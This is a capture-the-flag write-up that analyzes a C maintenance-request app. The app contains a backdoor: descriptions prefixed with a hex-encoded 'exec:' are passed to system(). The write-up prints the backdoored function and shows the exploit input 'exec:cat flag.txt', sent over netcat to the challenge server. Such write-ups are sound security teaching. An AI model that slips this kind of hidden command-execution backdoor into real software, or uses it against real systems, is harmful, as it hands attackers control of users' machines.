Flash CTF – Rear Hatch

January 23, 2025
Challenge Writeups
2 min read

Challenge Overview

In this challenge, we are tasked with analyzing a Maintenance Schedule Management application for potential backdoors introduced by an external contractor. We’ll review the provided source code to identify any malicious functionalities and then connect to the live service to validate our findings.

Steps to Solve

1. Analyzing the Source Code

Upon examining the provided source code, we notice a suspicious condition within the markRequestCompleted function:

void markRequestCompleted() {
    int id;
    printf("Enter the ID of the request to mark as completed: ");
    scanf("%d", &id);
    for (int i = 0; i < requestCount; i++) {
        if (requests[i].id == id && (strncmp((char *)requests+i*264+4,"\x65\x78\x65\x63\x3a",5)==0?system((char *)requests+i*264+9),1:1)) {
            requests[i].isCompleted = 1;
            saveRequests();
            printf("Request marked as completed.\n");
            return;
        }
    }
    printf("Request with ID %d not found.\n", id);
    return;
}

Let’s break down the suspicious part:

  • Condition Check: The if statement includes a strncmp function that compares a portion of memory to the string "exec:" (hexadecimal \x65\x78\x65\x63\x3a).
  • Conditional Execution: If the comparison is true, it executes system((char *)requests+i*264+9), which runs a system command starting from the 10th byte of the request’s memory location.

This indicates a hidden functionality where, if a request’s description starts with "exec:", the application will execute the subsequent text as a system command.

2. Exploiting the Backdoor

To leverage this backdoor:

  1. Add a New Maintenance Request: When prompted for the description, input a command prefixed with "exec:". For example: “exec:cat flag.txt”
  2. Mark the Request as Completed: Choose the option to mark a request as completed and enter the ID of the request you just added.

By doing this, the application will execute the command cat flag.txt, displaying the contents of the flag.txt file.

3. Connecting to the Live Service

With our strategy in place, let’s connect to the live service using nc (Netcat):

nc kubenode.mctf.io 30014

Follow these steps:

  • Add a Maintenance Request:
    • Select the option to add a new request.
    • Enter the description: exec:cat flag.txt
  • Mark the Request as Completed:
    • Choose the option to mark a request as completed.
    • Enter the ID of your newly added request.

Upon completion, the application should display the contents of flag.txt, revealing the flag.

Conclusion

By carefully analyzing the source code, we identified a hidden backdoor that executes system commands prefixed with "exec:" in the request description. Exploiting this, we successfully retrieved the flag from the live service.

Flag: MetaCTF{4lw4ys_r34d_4ll_7h3_c0d3}

Sign In

Get Started